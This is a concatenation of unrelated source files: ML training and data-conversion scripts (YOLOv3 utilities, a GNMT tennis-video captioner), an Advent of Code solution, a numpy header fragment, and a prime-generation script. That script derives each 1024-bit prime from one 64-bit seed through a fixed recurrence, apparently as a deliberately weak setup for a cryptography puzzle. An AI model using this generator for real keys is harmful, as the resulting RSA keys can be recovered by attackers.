train(model,in_arg.epochs,in_arg.gpu,in_arg.learning_rate)
te.stop_and_print_time_elapsed()
te = TimeElapsed('Test')
test(model,in_arg.gpu)
te.stop_and_print_time_elapsed()
model.save(in_arg.arch,in_arg.epochs,in_arg.learning_rate,in_arg.save_dir)
|
the-stack_106_14749
|
import random
from Crypto.Util.number import * # pylint: disable=unused-wildcard-import
import gmpy2
import sys
import time
a = 0xe64a5f84e2762be5
chunk_size = 64
bits = 1024
def gen_prime(bits):
s = random.getrandbits(chunk_size)
while True:
s |= 0xc000000000000001
p = 0
for _ in range(bits // chunk_size):
p = (p << chunk_size) + s
s = a * s % 2**chunk_size
if gmpy2.is_prime(p):
return p
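# Note on the construction above (derived from the code, added for clarity):
# each candidate prime is the concatenation of bits // chunk_size = 16
# consecutive 64-bit chunks, where the first chunk is forced odd and large by
# the 0xc000000000000001 mask and every following chunk is a * previous_chunk
# mod 2**64, so the whole prime is determined by its top 64 bits.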
def progressbar(sum, iteration, suffix="", prefix="", length=50):
percent = ("{0:." + str(1) + "f}").format(100 * (iteration / sum))
filledLength = int(length * iteration // sum)
bar = "█" * filledLength + '-' * (length - filledLength)
sys.stdout.write('\r%s |%s| %s%% %s' % (suffix, bar, percent, prefix))
sys.stdout.flush()
if len(sys.argv) < 3:
sys.stderr.write("Usage: <file> <iterations>\n")
sys.stderr.flush()
exit()
iterations = int(sys.argv[2])
data = []
start = time.time()
for i in range(iterations):
data.append(gen_prime(bits))
    proc = int((time.time()-start)/(i+1)*(iterations-(i+1)))
    progressbar(iterations, i+1, "Generating :", "Remaining Time: {}".format(time.strftime("%Hh %Mmin %Ss", time.gmtime(proc))))
print(time.time()-start)
with open(sys.argv[1], "w") as f:
for i in range(iterations):
f.write(hex(data[i]) + "\n")
progressbar(iterations, i+1, "Saving :")
print("\nDone")
|
the-stack_106_14750
|
import os
from absl import logging, app
import numpy as np
import tensorflow as tf
import cv2
import tensorflow_datasets as tfds
from object_detection.utils import dataset_util
YOLOV3_LAYER_LIST = [
'yolo_darknet',
'yolo_conv_0',
'yolo_output_0',
'yolo_conv_1',
'yolo_output_1',
'yolo_conv_2',
'yolo_output_2',
]
YOLOV3_TINY_LAYER_LIST = [
'yolo_darknet',
'yolo_conv_0',
'yolo_output_0',
'yolo_conv_1',
'yolo_output_1',
]
def load_darknet_weights(model, weights_file, tiny=False):
wf = open(weights_file, 'rb')
major, minor, revision, seen, _ = np.fromfile(wf, dtype=np.int32, count=5)
if tiny:
layers = YOLOV3_TINY_LAYER_LIST
else:
layers = YOLOV3_LAYER_LIST
for layer_name in layers:
sub_model = model.get_layer(layer_name)
for i, layer in enumerate(sub_model.layers):
if not layer.name.startswith('conv2d'):
continue
batch_norm = None
if i + 1 < len(sub_model.layers) and \
sub_model.layers[i + 1].name.startswith('batch_norm'):
batch_norm = sub_model.layers[i + 1]
logging.info("{}/{} {}".format(
sub_model.name, layer.name, 'bn' if batch_norm else 'bias'))
filters = layer.filters
size = layer.kernel_size[0]
in_dim = layer.get_input_shape_at(0)[-1]
if batch_norm is None:
conv_bias = np.fromfile(wf, dtype=np.float32, count=filters)
else:
# darknet [beta, gamma, mean, variance]
bn_weights = np.fromfile(
wf, dtype=np.float32, count=4 * filters)
# tf [gamma, beta, mean, variance]
bn_weights = bn_weights.reshape((4, filters))[[1, 0, 2, 3]]
# darknet shape (out_dim, in_dim, height, width)
conv_shape = (filters, in_dim, size, size)
conv_weights = np.fromfile(
wf, dtype=np.float32, count=np.product(conv_shape))
# tf shape (height, width, in_dim, out_dim)
conv_weights = conv_weights.reshape(
conv_shape).transpose([2, 3, 1, 0])
if batch_norm is None:
layer.set_weights([conv_weights, conv_bias])
else:
layer.set_weights([conv_weights])
batch_norm.set_weights(bn_weights)
assert len(wf.read()) == 0, 'failed to read all data'
wf.close()
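# Summary of the weights-file layout consumed above (as read by this function):
#   header : 5 x int32 (major, minor, revision, seen, _)
#   then, per conv2d layer in model order:
#     - filters x float32 biases                 (only layers without batch norm)
#     - 4 x filters x float32 bn params          (beta, gamma, mean, variance)
#     - filters * in_dim * size * size x float32 conv weights, stored as
#       (out_dim, in_dim, height, width) and transposed to TF's (h, w, in, out)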
def broadcast_iou(box_1, box_2):
# box_1: (..., (x1, y1, x2, y2))
# box_2: (N, (x1, y1, x2, y2))
# broadcast boxes
box_1 = tf.expand_dims(box_1, -2)
box_2 = tf.expand_dims(box_2, 0)
# new_shape: (..., N, (x1, y1, x2, y2))
new_shape = tf.broadcast_dynamic_shape(tf.shape(box_1), tf.shape(box_2))
box_1 = tf.broadcast_to(box_1, new_shape)
box_2 = tf.broadcast_to(box_2, new_shape)
int_w = tf.maximum(tf.minimum(box_1[..., 2], box_2[..., 2]) -
tf.maximum(box_1[..., 0], box_2[..., 0]), 0)
int_h = tf.maximum(tf.minimum(box_1[..., 3], box_2[..., 3]) -
tf.maximum(box_1[..., 1], box_2[..., 1]), 0)
int_area = int_w * int_h
box_1_area = (box_1[..., 2] - box_1[..., 0]) * \
(box_1[..., 3] - box_1[..., 1])
box_2_area = (box_2[..., 2] - box_2[..., 0]) * \
(box_2[..., 3] - box_2[..., 1])
return int_area / (box_1_area + box_2_area - int_area)
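# Hedged worked example (box values are assumptions for illustration):
#   b1 = tf.constant([[0.0, 0.0, 1.0, 1.0]])               # shape (1, 4)
#   b2 = tf.constant([[0.0, 0.0, 1.0, 1.0],
#                     [0.5, 0.5, 1.5, 1.5]])               # shape (2, 4)
#   broadcast_iou(b1, b2)  # -> [[1.0, 0.1429]], i.e. 0.25 overlap / 1.75 union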
def draw_outputs(img, outputs, class_names):
boxes, objectness, classes, nums = outputs
boxes, objectness, classes, nums = boxes[0], objectness[0], classes[0], nums[0]
wh = np.flip(img.shape[0:2])
cropped_image = []
for i in range(nums):
x1y1 = tuple((np.array(boxes[i][0:2]) * wh).astype(np.int32))
x2y2 = tuple((np.array(boxes[i][2:4]) * wh).astype(np.int32))
cropped_image.append(img[x1y1[1]:x2y2[1],x1y1[0]:x2y2[0],:].copy())
img = cv2.rectangle(img, x1y1, x2y2, (255, 0, 0), 2)
img = cv2.putText(img, '{} {:.4f}'.format(
class_names[int(classes[i])], objectness[i]),
x1y1, cv2.FONT_HERSHEY_COMPLEX_SMALL, 1, (0, 0, 255), 2)
return img,cropped_image
def draw_labels(x, y, class_names):
img = x.numpy()
boxes, classes = tf.split(y, (4, 1), axis=-1)
classes = classes[..., 0]
wh = np.flip(img.shape[0:2])
for i in range(len(boxes)):
x1y1 = tuple((np.array(boxes[i][0:2]) * wh).astype(np.int32))
x2y2 = tuple((np.array(boxes[i][2:4]) * wh).astype(np.int32))
img = cv2.rectangle(img, x1y1, x2y2, (255, 0, 0), 2)
img = cv2.putText(img, class_names[classes[i]],
x1y1, cv2.FONT_HERSHEY_COMPLEX_SMALL,
1, (0, 0, 255), 2)
return img
def freeze_all(model, frozen=True):
model.trainable = not frozen
if isinstance(model, tf.keras.Model):
for l in model.layers:
freeze_all(l, frozen)
def main(batch_size=1, split='test'):
dataset = tfds.load(
name='wider_face',
split=split,
data_dir=os.path.join('..', 'data', 'wider_face'),
shuffle_files=True,
download=True)
ds_numpy = tfds.as_numpy(dataset)
writer = tf.io.TFRecordWriter('../data/tfrecord/test')
path = os.path.join('../data/wider_face/downloads/extracted/ZIP.ucexport_download_id_0B6eKvaijfFUDbW4tdGpaYjgzOwMT4R6ikuxYiUtHrEwFA7Iw4SVAMwhF1wp3mCQfiNM/WIDER_test/images')
for ex in ds_numpy:
tf_ex = create_tfrecord(ex,path)
writer.write(tf_ex.SerializeToString())
writer.close()
print('successfully created in ../data/tfrecord')
def _bytes_list_feature(value):
return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))
def _float_list_feature(value):
    return tf.train.Feature(float_list=tf.train.FloatList(value=value))
def create_tfrecord(ex,path):
with tf.io.gfile.GFile(os.path.join(path, '{}'.format(ex['image/filename'].decode('utf-8'))), 'rb') as fid:
encoded_jpg = fid.read()
xmins = []
xmaxs = []
ymins = []
ymaxs = []
classes_text = []
for face in ex['faces']['bbox']:
xmins.append(face[0])
xmaxs.append(face[2])
ymins.append(face[1])
ymaxs.append(face[3])
classes_text.append('face'.encode('utf-8'))
tf_ex = tf.train.Example(features=tf.train.Features(feature={
'image/encoded': dataset_util.bytes_feature(encoded_jpg),
'image/object/bbox/xmin': dataset_util.float_list_feature(xmins),
'image/object/bbox/xmax': dataset_util.float_list_feature(xmaxs),
'image/object/bbox/ymin': dataset_util.float_list_feature(ymins),
'image/object/bbox/ymax': dataset_util.float_list_feature(ymaxs),
'image/object/class/text': dataset_util.bytes_list_feature(classes_text)
}))
return tf_ex
if __name__=='__main__':
app.run(main)
|
the-stack_106_14753
|
from util import read_puzzle_input
def _parse_input(puzzle_input):
return [int(line) for line in puzzle_input.split("\n") if line != ""]
def has_pair_that_sums(number, preamble):
for i in range(len(preamble) - 1):
for j in range(i + 1, len(preamble)):
if preamble[i] + preamble[j] == number:
return True
return False
def first_invalid_number(puzzle_input, preamble_size=25):
encrypted_data = _parse_input(puzzle_input)
    for i in range(len(encrypted_data) - preamble_size):
test_number = encrypted_data[i + preamble_size]
preamble = encrypted_data[i : i + preamble_size]
if not has_pair_that_sums(number=test_number, preamble=preamble):
return test_number
return None
def encryption_weakness(puzzle_input, preamble_size=25):
invalid_number = first_invalid_number(puzzle_input, preamble_size=preamble_size)
encrypted_data = _parse_input(puzzle_input)
for i in range(len(encrypted_data) - 1):
for j in range(i + 1, len(encrypted_data)):
contiguous_set = encrypted_data[i : j + 1]
if sum(contiguous_set) == invalid_number:
return max(contiguous_set) + min(contiguous_set)
elif sum(contiguous_set) > invalid_number:
break
return None
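# Worked example (the Advent of Code 2020 day 9 sample, preamble_size=5):
#   data = [35, 20, 15, 25, 47, 40, 62, 55, 65, 95, 102, 117, 150, 182, 127,
#           219, 299, 277, 309, 576]
#   first_invalid_number(...) -> 127  (no pair of the 5 preceding values sums to it)
#   encryption_weakness(...)  -> 62   (contiguous run 15+25+47+40 == 127; 15 + 47)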
if __name__ == "__main__":
puzzle_input = read_puzzle_input()
print(f"Part 1: {first_invalid_number(puzzle_input)}")
print(f"Part 2: {encryption_weakness(puzzle_input)}")
|
the-stack_106_14756
|
"""
Google Neural Machine Translation
=================================
@article{wu2016google,
title={Google's neural machine translation system:
Bridging the gap between human and machine translation},
author={Wu, Yonghui and Schuster, Mike and Chen, Zhifeng and Le, Quoc V and
Norouzi, Mohammad and Macherey, Wolfgang and Krikun, Maxim and Cao, Yuan and Gao, Qin and
Macherey, Klaus and others},
journal={arXiv preprint arXiv:1609.08144},
year={2016}
}
"""
from absl import app, flags
from absl.flags import FLAGS
import time
import random
import os
import io
import sys
from tensorboardX import SummaryWriter
import logging
import numpy as np
import mxnet as mx
from mxnet import gluon
import gluonnlp as nlp
from gluonnlp.model.translation import NMTModel
from gluonnlp.loss import MaskedSoftmaxCELoss
from models.captioning.gnmt import get_gnmt_encoder_decoder
from utils.translation import BeamSearchTranslator
from metrics.bleu import compute_bleu
from utils.captioning import get_dataloaders, write_sentences, get_comp_str
from dataset import TennisSet
from models.vision.definitions import FrameModel
from utils.layers import TimeDistributed
from gluoncv.model_zoo import get_model
from mxnet.gluon.data.vision import transforms
from nlgeval import NLGEval
np.random.seed(100)
random.seed(100)
mx.random.seed(10000)
flags.DEFINE_string('model_id', '0000',
'model identification string')
flags.DEFINE_integer('epochs', 40,
'How many training epochs to complete')
flags.DEFINE_integer('num_hidden', 128,
'Dimension of the states')
flags.DEFINE_integer('emb_size', 100,
'Dimension of the embedding vectors')
flags.DEFINE_float('dropout', 0.2,
'dropout applied to layers (0 = no dropout)')
flags.DEFINE_integer('num_layers', 2,
'Number of layers in the encoder and decoder')
flags.DEFINE_integer('num_bi_layers', 1,
'Number of bidirectional layers in the encoder and decoder')
flags.DEFINE_string('cell_type', 'gru',
'gru or lstm')
flags.DEFINE_integer('batch_size', 128,
'Batch size for detection: higher faster, but more memory intensive.')
flags.DEFINE_integer('beam_size', 4,
'Beam size.')
flags.DEFINE_float('lp_alpha', 1.0,
'Alpha used in calculating the length penalty')
flags.DEFINE_integer('lp_k', 5,
'K used in calculating the length penalty')
flags.DEFINE_integer('test_batch_size', 32,
'Test batch size')
flags.DEFINE_integer('num_buckets', 5,
'Bucket number')
flags.DEFINE_string('bucket_scheme', 'constant',
'Strategy for generating bucket keys. It supports: '
'"constant": all the buckets have the same width; '
'"linear": the width of bucket increases linearly; '
'"exp": the width of bucket increases exponentially')
flags.DEFINE_float('bucket_ratio', 0.0,
'Ratio for increasing the throughput of the bucketing')
flags.DEFINE_integer('tgt_max_len', 50,
'Maximum length of the target sentence')
flags.DEFINE_string('optimizer', 'adam',
'optimization algorithm')
flags.DEFINE_float('lr', 1E-3,
'Initial learning rate')
flags.DEFINE_float('lr_update_factor', 0.5,
'Learning rate decay factor')
flags.DEFINE_float('clip', 5.0,
'gradient clipping')
flags.DEFINE_integer('log_interval', 100,
'Logging mini-batch interval.')
flags.DEFINE_integer('num_gpus', 1,
'Number of GPUs to use')
flags.DEFINE_string('backbone', 'DenseNet121',
'Backbone CNN name')
flags.DEFINE_string('backbone_from_id', None,
'Load a backbone model from a model_id, used for Temporal Pooling with fine-tuned CNN')
flags.DEFINE_bool('freeze_backbone', False,
'Freeze the backbone model')
flags.DEFINE_integer('data_shape', 512,
'The width and height for the input image to be cropped to.')
flags.DEFINE_integer('every', 1,
'Use only every this many frames: [train, val, test] splits')
flags.DEFINE_string('feats_model', None,
'load CNN features as npy files from this model')
flags.DEFINE_string('emb_file', 'embeddings-ex.txt',
'the word embedding file generated by train_embeddings.py')
def main(_argv):
os.makedirs(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id), exist_ok=True)
if FLAGS.num_gpus > 0: # only supports 1 GPU
ctx = mx.gpu()
else:
ctx = mx.cpu()
# Set up logging
logging.basicConfig()
logger = logging.getLogger()
logger.setLevel(logging.INFO)
log_file_path = os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'log.txt')
log_dir = os.path.dirname(log_file_path)
if log_dir and not os.path.exists(log_dir):
os.makedirs(log_dir)
fh = logging.FileHandler(log_file_path)
logger.addHandler(fh)
key_flags = FLAGS.get_key_flags_for_module(sys.argv[0])
logging.info('\n'.join(f.serialize() for f in key_flags))
# set up tensorboard summary writer
tb_sw = SummaryWriter(log_dir=os.path.join(log_dir, 'tb'), comment=FLAGS.model_id)
# are we using features or do we include the CNN?
if FLAGS.feats_model is None:
backbone_net = get_model(FLAGS.backbone, pretrained=True, ctx=ctx).features
cnn_model = FrameModel(backbone_net, 11) # hardcoded the number of classes
if FLAGS.backbone_from_id:
if os.path.exists(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id)):
files = os.listdir(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id))
files = [f for f in files if f[-7:] == '.params']
if len(files) > 0:
files = sorted(files, reverse=True) # put latest model first
model_name = files[0]
cnn_model.load_parameters(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id, model_name), ctx=ctx)
logging.info('Loaded backbone params: {}'.format(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id, model_name)))
else:
raise FileNotFoundError('{}'.format(os.path.join('models', 'vision', 'experiments', FLAGS.backbone_from_id)))
if FLAGS.freeze_backbone:
for param in cnn_model.collect_params().values():
param.grad_req = 'null'
cnn_model = TimeDistributed(cnn_model.backbone)
src_embed = cnn_model
transform_train = transforms.Compose([
transforms.RandomResizedCrop(FLAGS.data_shape),
transforms.RandomFlipLeftRight(),
transforms.RandomColorJitter(brightness=0.4, contrast=0.4, saturation=0.4),
transforms.RandomLighting(0.1),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
transform_test = transforms.Compose([
transforms.Resize(FLAGS.data_shape + 32),
transforms.CenterCrop(FLAGS.data_shape),
transforms.ToTensor(),
transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225))
])
else:
from mxnet.gluon import nn # need to do this to force no use of Embedding on src
src_embed = nn.HybridSequential(prefix='src_embed_')
with src_embed.name_scope():
src_embed.add(nn.Dropout(rate=0.0))
transform_train = None
transform_test = None
# setup the data
data_train = TennisSet(split='train', transform=transform_train, captions=True, max_cap_len=FLAGS.tgt_max_len,
every=FLAGS.every, feats_model=FLAGS.feats_model)
data_val = TennisSet(split='val', transform=transform_test, captions=True, vocab=data_train.vocab,
every=FLAGS.every, inference=True, feats_model=FLAGS.feats_model)
data_test = TennisSet(split='test', transform=transform_test, captions=True, vocab=data_train.vocab,
every=FLAGS.every, inference=True, feats_model=FLAGS.feats_model)
val_tgt_sentences = data_val.get_captions(split=True)
test_tgt_sentences = data_test.get_captions(split=True)
write_sentences(val_tgt_sentences, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'val_gt.txt'))
write_sentences(test_tgt_sentences, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'test_gt.txt'))
# load embeddings for tgt_embed
if FLAGS.emb_file:
word_embs = nlp.embedding.TokenEmbedding.from_file(file_path=os.path.join('data', FLAGS.emb_file))
data_train.vocab.set_embedding(word_embs)
input_dim, output_dim = data_train.vocab.embedding.idx_to_vec.shape
tgt_embed = gluon.nn.Embedding(input_dim, output_dim)
tgt_embed.initialize(ctx=ctx)
tgt_embed.weight.set_data(data_train.vocab.embedding.idx_to_vec)
else:
tgt_embed = None
# setup the model
encoder, decoder = get_gnmt_encoder_decoder(cell_type=FLAGS.cell_type,
hidden_size=FLAGS.num_hidden,
dropout=FLAGS.dropout,
num_layers=FLAGS.num_layers,
num_bi_layers=FLAGS.num_bi_layers)
model = NMTModel(src_vocab=None, tgt_vocab=data_train.vocab, encoder=encoder, decoder=decoder,
embed_size=FLAGS.emb_size, prefix='gnmt_', src_embed=src_embed, tgt_embed=tgt_embed)
model.initialize(init=mx.init.Uniform(0.1), ctx=ctx)
static_alloc = True
model.hybridize(static_alloc=static_alloc)
logging.info(model)
start_epoch = 0
if os.path.exists(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id)):
files = os.listdir(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id))
files = [f for f in files if f[-7:] == '.params']
if len(files) > 0:
files = sorted(files, reverse=True) # put latest model first
model_name = files[0]
if model_name == 'valid_best.params':
model_name = files[1]
start_epoch = int(model_name.split('.')[0]) + 1
model.load_parameters(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, model_name), ctx=ctx)
logging.info('Loaded model params: {}'.format(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, model_name)))
# setup the beam search
translator = BeamSearchTranslator(model=model, beam_size=FLAGS.beam_size,
scorer=nlp.model.BeamSearchScorer(alpha=FLAGS.lp_alpha, K=FLAGS.lp_k),
max_length=FLAGS.tgt_max_len + 100)
logging.info('Use beam_size={}, alpha={}, K={}'.format(FLAGS.beam_size, FLAGS.lp_alpha, FLAGS.lp_k))
# setup the loss function
loss_function = MaskedSoftmaxCELoss()
loss_function.hybridize(static_alloc=static_alloc)
# run the training
train(data_train, data_val, data_test, model, loss_function, val_tgt_sentences, test_tgt_sentences,
translator, start_epoch, ctx, tb_sw)
def evaluate(data_loader, model, loss_function, translator, data_train, ctx):
"""Evaluate
"""
translation_out = []
all_inst_ids = []
avg_loss_denom = 0
avg_loss = 0.0
for batch_id, (src_seq, tgt_seq, src_valid_length, tgt_valid_length, inst_ids) in enumerate(data_loader):
# Put on ctxs
src_seq = src_seq.as_in_context(ctx)
tgt_seq = tgt_seq.as_in_context(ctx)
src_valid_length = src_valid_length.as_in_context(ctx)
tgt_valid_length = tgt_valid_length.as_in_context(ctx)
# Calculating Loss
out, _ = model(src_seq, tgt_seq[:, :-1], src_valid_length, tgt_valid_length - 1)
loss = loss_function(out, tgt_seq[:, 1:], tgt_valid_length - 1).mean().asscalar()
all_inst_ids.extend(inst_ids.asnumpy().astype(np.int32).tolist())
avg_loss += loss * (tgt_seq.shape[1] - 1)
avg_loss_denom += (tgt_seq.shape[1] - 1)
# Translate
samples, _, sample_valid_length =\
translator.translate(src_seq=src_seq, src_valid_length=src_valid_length)
max_score_sample = samples[:, 0, :].asnumpy()
sample_valid_length = sample_valid_length[:, 0].asnumpy()
for i in range(max_score_sample.shape[0]):
translation_out.append(
[data_train.vocab.idx_to_token[ele] for ele in
max_score_sample[i][1:(sample_valid_length[i] - 1)]])
avg_loss = avg_loss / avg_loss_denom
real_translation_out = [None for _ in range(len(all_inst_ids))]
for ind, sentence in zip(all_inst_ids, translation_out):
real_translation_out[ind] = sentence
return avg_loss, real_translation_out
def train(data_train, data_val, data_test, model, loss_function, val_tgt_sentences, test_tgt_sentences,
translator, start_epoch, ctx, tb_sw=None):
"""Training function.
"""
trainer = gluon.Trainer(model.collect_params(), FLAGS.optimizer, {'learning_rate': FLAGS.lr})
train_data_loader, val_data_loader, test_data_loader = get_dataloaders(data_train, data_val, data_test)
best_valid_bleu = 0.0
for epoch_id in range(start_epoch, FLAGS.epochs):
log_avg_loss = 0
log_wc = 0
log_start_time = time.time()
for batch_id, (src_seq, tgt_seq, src_valid_length, tgt_valid_length) in enumerate(train_data_loader):
# if batch_id == len(train_data_loader)-1:
# break # errors on last batch, jump out for now
# put on the right ctx
src_seq = src_seq.as_in_context(ctx)
tgt_seq = tgt_seq.as_in_context(ctx)
src_valid_length = src_valid_length.as_in_context(ctx)
tgt_valid_length = tgt_valid_length.as_in_context(ctx)
# calc the outs, the loss and back pass
with mx.autograd.record():
out, _ = model(src_seq, tgt_seq[:, :-1], src_valid_length, tgt_valid_length - 1)
loss = loss_function(out, tgt_seq[:, 1:], tgt_valid_length - 1).mean()
loss = loss * (tgt_seq.shape[1] - 1) / (tgt_valid_length - 1).mean()
loss.backward()
# step the trainer and add up some losses
trainer.step(1)
src_wc = src_valid_length.sum().asscalar()
tgt_wc = (tgt_valid_length - 1).sum().asscalar()
step_loss = loss.asscalar()
log_avg_loss += step_loss
log_wc += src_wc + tgt_wc
# log this batches statistics
if tb_sw:
tb_sw.add_scalar(tag='Training_loss',
scalar_value=step_loss,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Training_ppl',
scalar_value=np.exp(step_loss),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
if (batch_id + 1) % FLAGS.log_interval == 0:
wps = log_wc / (time.time() - log_start_time)
logging.info('[Epoch {} Batch {}/{}] loss={:.4f}, ppl={:.4f} throughput={:.2f}K wps, wc={:.2f}K'
.format(epoch_id, batch_id + 1, len(train_data_loader),
log_avg_loss / FLAGS.log_interval,
np.exp(log_avg_loss / FLAGS.log_interval),
wps / 1000, log_wc / 1000))
log_start_time = time.time()
log_avg_loss = 0
log_wc = 0
# log embeddings
if tb_sw:
embs = mx.nd.array(list(range(len(data_train.vocab)))).as_in_context(ctx)
embs = model.tgt_embed(embs)
labs = data_train.vocab.idx_to_token
tb_sw.add_embedding(mat=embs.asnumpy(), metadata=labs,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
# calculate validation and loss stats at end of epoch
valid_loss, valid_translation_out = evaluate(val_data_loader, model, loss_function, translator, data_train, ctx)
valid_bleu_score, _, _, _, _ = compute_bleu([val_tgt_sentences], valid_translation_out)
# valid_met_score = meteor_score([[' '.join(sent)] for sent in val_tgt_sentences], [' '.join(sent) for sent in valid_translation_out])
str_ = '[Epoch {}] valid Loss={:.4f}, valid ppl={:.4f}, valid bleu={:.2f}'.format(
epoch_id, valid_loss, np.exp(valid_loss), valid_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in val_tgt_sentences]],
[' '.join(sent) for sent in valid_translation_out])
for k, v in metrics_dict.items():
str_ += ', valid '+k+'={:.4f}'.format(float(v))
logging.info(str_)
# log the validation and loss stats
if tb_sw:
tb_sw.add_scalar(tag='Validation_loss',
scalar_value=valid_loss,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Validation_ppl',
scalar_value=np.exp(valid_loss),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Validation_bleu',
scalar_value=valid_bleu_score * 100,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_text(tag='Validation Caps',
text_string=get_comp_str(val_tgt_sentences, valid_translation_out),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
for k, v in metrics_dict.items():
tb_sw.add_scalar(tag='Validation_'+k,
scalar_value=float(v),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
# also calculate the test stats
test_loss, test_translation_out = evaluate(test_data_loader, model, loss_function, translator, data_train, ctx)
test_bleu_score, _, _, _, _ = compute_bleu([test_tgt_sentences], test_translation_out)
# test_met_score = meteor_score([test_tgt_sentences], test_translation_out)
str_ = '[Epoch {}] test Loss={:.4f}, test ppl={:.4f}, test bleu={:.2f}'.format(
epoch_id, test_loss, np.exp(test_loss), test_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in test_tgt_sentences]],
[' '.join(sent) for sent in test_translation_out])
for k, v in metrics_dict.items():
str_ += ', test '+k+'={:.4f}'.format(float(v))
logging.info(str_)
# and log the test stats
if tb_sw:
tb_sw.add_scalar(tag='Test_loss',
scalar_value=test_loss,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Test_ppl',
scalar_value=np.exp(test_loss),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_scalar(tag='Test_bleu',
scalar_value=test_bleu_score * 100,
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
tb_sw.add_text(tag='Test Caps',
text_string=get_comp_str(test_tgt_sentences, test_translation_out),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
for k, v in metrics_dict.items():
tb_sw.add_scalar(tag='Test_'+k,
scalar_value=float(v),
global_step=(epoch_id * len(data_train) + batch_id * FLAGS.batch_size))
# write out the validation and test sentences to files
write_sentences(valid_translation_out, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id,
'epoch{:d}_valid_out.txt').format(epoch_id))
write_sentences(test_translation_out, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id,
'epoch{:d}_test_out.txt').format(epoch_id))
# save the model params if best
if valid_bleu_score > best_valid_bleu:
best_valid_bleu = valid_bleu_score
save_path = os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'valid_best.params')
logging.info('Save best parameters to {}'.format(save_path))
model.save_parameters(save_path)
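# After two thirds of the scheduled epochs, decay the learning rate at the
# end of every remaining epoch by FLAGS.lr_update_factor.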
if epoch_id + 1 >= (FLAGS.epochs * 2) // 3:
new_lr = trainer.learning_rate * FLAGS.lr_update_factor
logging.info('Learning rate change to {}'.format(new_lr))
trainer.set_learning_rate(new_lr)
model.save_parameters(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, "{:04d}.params".format(epoch_id)))
# load and evaluate the best model
if os.path.exists(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'valid_best.params')):
model.load_parameters(os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'valid_best.params'))
valid_loss, valid_translation_out = evaluate(val_data_loader, model, loss_function, translator, data_train, ctx)
valid_bleu_score, _, _, _, _ = compute_bleu([val_tgt_sentences], valid_translation_out)
str_ = 'Best model valid Loss={:.4f}, valid ppl={:.4f}, valid bleu={:.2f}'.format(
valid_loss, np.exp(valid_loss), valid_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in val_tgt_sentences]],
[' '.join(sent) for sent in valid_translation_out])
for k, v in metrics_dict.items():
str_ += ', valid ' + k + '={:.4f}'.format(float(v))
logging.info(str_)
test_loss, test_translation_out = evaluate(test_data_loader, model, loss_function, translator, data_train, ctx)
test_bleu_score, _, _, _, _ = compute_bleu([test_tgt_sentences], test_translation_out)
str_ = 'Best model test Loss={:.4f}, test ppl={:.4f}, test bleu={:.2f}'.format(
test_loss, np.exp(test_loss), test_bleu_score * 100)
nlgeval = NLGEval()
metrics_dict = nlgeval.compute_metrics([[' '.join(sent) for sent in test_tgt_sentences]],
[' '.join(sent) for sent in test_translation_out])
for k, v in metrics_dict.items():
str_ += ', test ' + k + '={:.4f}'.format(float(v))
logging.info(str_)
write_sentences(valid_translation_out, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'best_valid_out.txt'))
write_sentences(test_translation_out, os.path.join('models', 'captioning', 'experiments', FLAGS.model_id, 'best_test_out.txt'))
if __name__ == '__main__':
try:
app.run(main)
except SystemExit:
pass
|
the-stack_106_14757
|
import os
import genapi
import numpy_api
from genapi import TypeApi, FunctionApi
h_template = r"""
#ifdef _UMATHMODULE
extern NPY_NO_EXPORT PyTypeObject PyUFunc_Type;
%s
#else
#if defined(PY_UFUNC_UNIQUE_SYMBOL)
#define PyUFunc_API PY_UFUNC_UNIQUE_SYMBOL
#endif
#if defined(NO_IMPORT) || defined(NO_IMPORT_UFUNC)
extern void **PyUFunc_API;
#else
#if defined(PY_UFUNC_UNIQUE_SYMBOL)
void **PyUFunc_API;
#else
static void **PyUFunc_API=NULL;
#endif
#endif
%s
static NPY_INLINE int
_import_umath(void)
{
PyObject *numpy = PyImport_ImportModule("numpy.core._multiarray_umath");
PyObject *c_api = NULL;
if (numpy == NULL) {
PyErr_SetString(PyExc_ImportError,
"numpy.core._multiarray_umath failed to import");
return -1;
}
c_api = PyObject_GetAttrString(numpy, "_UFUNC_API");
